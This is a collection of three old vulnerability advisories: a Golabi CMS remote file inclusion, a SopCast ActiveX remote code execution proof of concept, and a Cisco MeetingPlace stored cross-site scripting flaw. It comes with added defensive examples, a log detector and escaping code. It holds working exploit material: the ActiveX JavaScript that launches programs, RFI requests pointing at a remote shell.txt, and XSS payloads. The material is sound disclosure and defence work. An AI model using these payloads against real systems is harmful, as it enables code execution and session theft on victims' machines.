[+] Application Info:
[*] Name: Golabi CMS
[*] Author: R3dM0ve
[*] HomePage: http://golabicms.sourceforge.net/
[*] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr

[+] Vulnerability Info:
[*] Type: Remote File Inclusion (RFI)
[*] Requirement: register_globals [ON]
[*] Risk: High Critical
[*] Bug Hunter: CrazyAngel
[*] Details: Unhandled variable inclusion in the default template file results in an RFI vulnerability
[*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]
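The advisory gives the request shape but nothing an operator could look for. The following is an added example, not part of the advisory or of Golabi CMS: a detector for inclusion attempts of this kind run over constructed Apache combined-format access log lines. Only the request path and the main_loaded/cur_module parameter names are taken from the advisory's URL; the client addresses, remote host, timestamps and payloads are made up, and the scheme list covers the PHP stream wrappers that turn an include() into a remote fetch or inline code, not just http.

```python
"""Added example, not part of the advisory or of Golabi CMS: a detector for
remote-file-inclusion attempts of the kind the advisory describes, run over
constructed Apache combined-format access log lines. The request path and
the cur_module/main_loaded parameter names come from the advisory's URL;
the IP addresses, hosts, timestamps and payloads are made up."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Schemes/wrappers that make include() fetch or synthesise code instead of
# reading a local template file.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect)\s*:', re.I)


def rfi_hits(log_line: str):
    """Return (client_ip, path, [(param, decoded_value), ...]) when any
    query parameter carries a remote URL or stream wrapper, else None."""
    m = LOG_RE.match(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = unquote(unquote(value))   # peel extra layers of %-encoding
        if REMOTE_SCHEME_RE.match(decoded):
            hits.append((name, decoded))
    return (m.group("ip"), url.path, hits) if hits else None


def scan(lines):
    return [h for h in (rfi_hits(line) for line in lines) if h]


# Constructed log lines (TEST-NET addresses); only line 3 is a benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Feb/2009:10:12:01 +0000] "GET /templates/default/index_logged.php'
    '?main_loaded=1&cur_module=http://198.51.100.7/shell.txt? HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Feb/2009:10:12:09 +0000] "GET /templates/default/index_logged.php'
    '?main_loaded=1&cur_module=http%3A%2F%2F198.51.100.7%2Fshell.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Feb/2009:10:12:15 +0000] "GET /templates/default/index_logged.php'
    '?main_loaded=1&cur_module=http%253A%252F%252F198.51.100.7%252Fshell.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [26/Feb/2009:10:13:00 +0000] "GET /templates/default/index_logged.php'
    '?main_loaded=1&cur_module=news HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2009:10:14:30 +0000] "GET /index.php'
    '?cur_module=data%3Atext%2Fplain%2C%3C%3Fphp%20phpinfo()%3B%3F%3E HTTP/1.1" 200 900 "-" "curl/7.19"',
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        for param, value in hits:
            print(f"RFI attempt from {ip} on {path}: {param}={value}")
```

Double decoding matters because a web server logs the request line as received, so an attacker who encodes the URL twice defeats a detector that only looks for the literal string "http://". A 200 status on such a request is worth treating as a probable compromise rather than a mere probe.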
Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
// SopPlayer is the page's instance of the SopCast ActiveX control (sopocx.ocx);
// the object element that creates it is not reproduced here.
window.onload = function () {
    SopPlayer.InitPlayer();
    // variant left commented out in the PoC: a program on another host
    //SopPlayer.SetExternalPlayer("192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
    SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
    SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); // a live channel
    SopPlayer.SetChannelName("CCTV5");
    SopPlayer.Play();
}

original url: http://retrogod.altervista.org/9sg_sopcastia.html
Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability
Title: Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability
CVE Identifier: N/A
Credit: Security Assurance Team of the National Australia Bank. The vendor was advised of this vulnerability prior to its public release. National Australia Bank adheres to the Guidelines for Security Vulnerability Reporting and Response V2.0 document when issuing Security Advisories.
Class: Stored Cross Site Scripting
Remote: Yes
Local: No
Vulnerable: Cisco Unified Meeting Place 6.0 and possibly 7.0; other versions may also be vulnerable.
Not Vulnerable:
Vendor: Cisco

Discussion:
Cisco Unified Meeting Place is a suite of products used for remote voice, video and web conferencing. The Cisco Unified Meeting Place web interface allows users to schedule and attend conferences. Each user has the ability to modify their own account settings such as their name, telephone extension, email address etc. National Australia Bank's Security Assurance Team have identified a stored cross site scripting vulnerability that could be exploited by a malicious user to execute code within another user's browser when they view a meeting created by the malicious user.

Exploit:
The E-mail Address field of this profile page is vulnerable to stored cross site scripting attacks. If a user enters the following in the email field, the code within the script tags will be executed whenever that user's profile data is viewed by other users, including when viewing the details of a meeting created by this user:

"><script>INSERT JAVASCRIPT HERE</script>

Solution:
No workaround available. This vulnerability is fixed in Cisco Unified MeetingPlace Web Conferencing software version 6.0(517.0), also known as Maintenance Release 4 (MR4) for the 6.0 release, and version 7.0(2), also known as Maintenance Release 1 (MR1) for the 7.0 release.

References:
Vendor Homepage: http://www.cisco.com
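The payload in the advisory opens with "> because the stored address is being written into an HTML attribute, and closing that attribute is what lets a new element begin. The following is an added example, not Cisco's code or the advisory's: a constructed model of such a profile field (MeetingPlace's real markup is not shown on the page) rendered unsafely and then with attribute-context escaping, plus the validation at save time that would have refused the value in the first place. A small HTML parser stands in for the victim's browser so the difference is visible as elements rather than as strings.

```python
"""Added example, not Cisco's code or the advisory's: a minimal model of the
profile field the advisory describes. The template, the validation regex
and the script body are assumptions made for illustration."""
import html
import re
from html.parser import HTMLParser

# Pattern of the advisory's proof of concept, with a concrete script body.
PAYLOAD = '"><script>alert(document.cookie)</script>'

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def render_profile_unsafe(email: str) -> str:
    """Echoes the stored value verbatim into a value attribute."""
    return f'<input type="text" name="email" value="{email}">'


def render_profile_escaped(email: str) -> str:
    """quote=True also encodes " and ', so the value cannot close the attribute."""
    return f'<input type="text" name="email" value="{html.escape(email, quote=True)}">'


def accept_email(value: str) -> bool:
    """Validation at save time: only a plausible address is stored at all."""
    return EMAIL_RE.fullmatch(value) is not None


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(markup: str) -> list:
    """Start tags a browser-like parser sees; a 'script' here means the
    stored value broke out of the attribute and became markup."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


if __name__ == "__main__":
    print("unsafe :", elements_in(render_profile_unsafe(PAYLOAD)))
    print("escaped:", elements_in(render_profile_escaped(PAYLOAD)))
    print("accepted on save:", accept_email(PAYLOAD), accept_email("alice@example.com"))
```

Both controls belong together: validation keeps junk out of the database, and escaping at the point of output protects every page that later displays the field, including the meeting details view the advisory mentions, which may not be the page the validation was written for.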